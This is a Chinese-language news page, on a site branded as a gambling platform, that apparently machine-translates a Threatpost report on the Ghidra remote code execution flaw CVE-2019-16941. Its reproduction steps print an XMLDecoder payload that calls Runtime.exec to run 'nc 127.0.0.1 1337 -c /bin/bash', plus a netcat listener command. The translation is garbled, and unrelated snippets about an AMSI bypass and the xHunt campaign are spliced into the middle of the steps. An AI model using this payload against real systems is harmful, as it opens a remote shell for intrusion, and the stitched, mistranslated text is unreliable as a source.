CVE-2019-16941: NSA Ghidra东西RCE破绽 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

CVE-2019-16941: NSA Ghidra东西RCE破绽

申博_新闻事件 申博 39次浏览 已收录 0个评论

看我怎样一步步将基于堆的 AMSI 绕过做到靠近圆满

这篇博文描述了如何在 Excel 中实现使用 VBA (Visual Basic for Applications) 绕过微软的AMSI (Antimalware Scan Interface)。 与其他的绕过思路不同的是,这种方法不使用硬编码的偏移量或操作码,而是识别堆上的关键数据并对其进行修改。 其他研究人员以前也提到过基于堆的绕过,但在撰写本文时,还没有可用的公共 PoC。 这篇博文将为读者提供关于 AMSI 实现的一些见解,以及一种绕过它的通用方法。 引言 自从微软推出 AMSI 实现以来,已经发布

Ghidra是由美国国家平安局(NSA)研讨部门开辟的软件逆向工程(SRE)套件,用于支撑网络平安使命。Ghidra是一个软件逆向工程(SRE)框架,包含一套功用完全的高端软件剖析东西,运用户能够在种种平台上剖析编译后的代码,包含Windows、Mac OS和Linux。功用包含反汇编,汇编,反编译,画图和剧本,以及数百个其他功用。Ghidra支撑种种处理器指令集和可实行花样,能够在用户交互形式和自动形式下运转。用户还能够运用公然的API开辟本身的Ghidra插件和剧本。

CVE-2019-16941: NSA Ghidra东西RCE破绽

https://ghidra-sre.org/ghidra_9.0_PUBLIC_20190228.zip

https://github.com/NationalSecurityAgency/ghidra

周六,平安研讨人员报告了一个影响Ghidra的中危破绽,依据NIST破绽数据库的形貌,进击者应用该破绽能够长途入侵暴露的体系。该破绽CVE编号为CVE-2019-16941,现在还没有关于该破绽的补丁。

破绽位于Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java的XMLDecoder,会激发Bit Patterns Explorer插件的长途代码实行。在启用了experimental mode(试验形式)的Ghidra中,假如Bit Patterns Explorer的Read XML Files特性运用修正的XML文件,就会致使恣意代码实行。破绽的应用须要进击者经由过程插件和一般的项目外的加载历程来加载歹意捏造的XML文件(由DumpFunctionPatternInfoScript建立然则被进击者修正的XML文件,比方挪用java.lang.Runtime.exec call)。

复现该破绽的步骤以下:

1: 用CodeBrowser翻开二进制文件

2. 在Window->Script Manager中挑选”DumpFunctionPatternInfoScript”

3. 导出获得的XML文件

4. 在文件末端的末了一个object闭合标签以后,</java>闭合标签之前加上以下内容:

xHunt:针对科威特航运构造的进击行为

概要 2019年5月至6月,unit42安全团队在一起针对科威特航运业的攻击事件中,检测到了一个新后门工具——Hisoka,它的作用是下载几个的定制工具进行后漏洞利用,所有工具似乎都由同一个开发人员创建,最早的一个工具其版本可以追溯到2018年7月。 工具的名称都借用了动漫《全职猎人》中的人物名字,这也是此次行动“xHunt”名称的来源,如后门工具Sakabota、Hisoka、Netero和Killua,它们通过HTTP、DNS隧道和电子邮件与C2通信。除了上述的后门工具外,还有名为Gon和EYE的工具,

<object class=”java.lang.Runtime” method=”getRuntime”> <void method=”exec”> <string>nc 127.0.0.1 1337 -c ’/bin/bash’</string> </void> </object>

5. 用敕令nc -lvnp 1337翻开当地监听服务

6. 在Window->Function Bit Patterns Explorer顶用File->Configure…启用试验形式

7. 在翻开的插件窗口中,点击Read XML Files,指向XML保存到目次并点击OK

8. 返回监听器,检察翻开的shell

事实上,在运转该插件时,是不应该实行xml文件中的代码的。

依据NSA Ghidra项目github的音讯,现在补丁正在开辟中。

https://github.com/NationalSecurityAgency/ghidra/issues/1090

这也并不是初次在Ghidra中发明破绽。本年3月,平安研讨人员宣布了进击Ghidra v9.0及更低版本的XML外部实体(XXE)破绽。7月,研讨人员发明了一个高危的途径提取破绽CVE-2019-13623。

New Bug Found in NSA’s Ghidra Tool

本文翻译自:https://threatpost.com/bug-in-nsas-ghidra/148787


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明CVE-2019-16941: NSA Ghidra东西RCE破绽
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址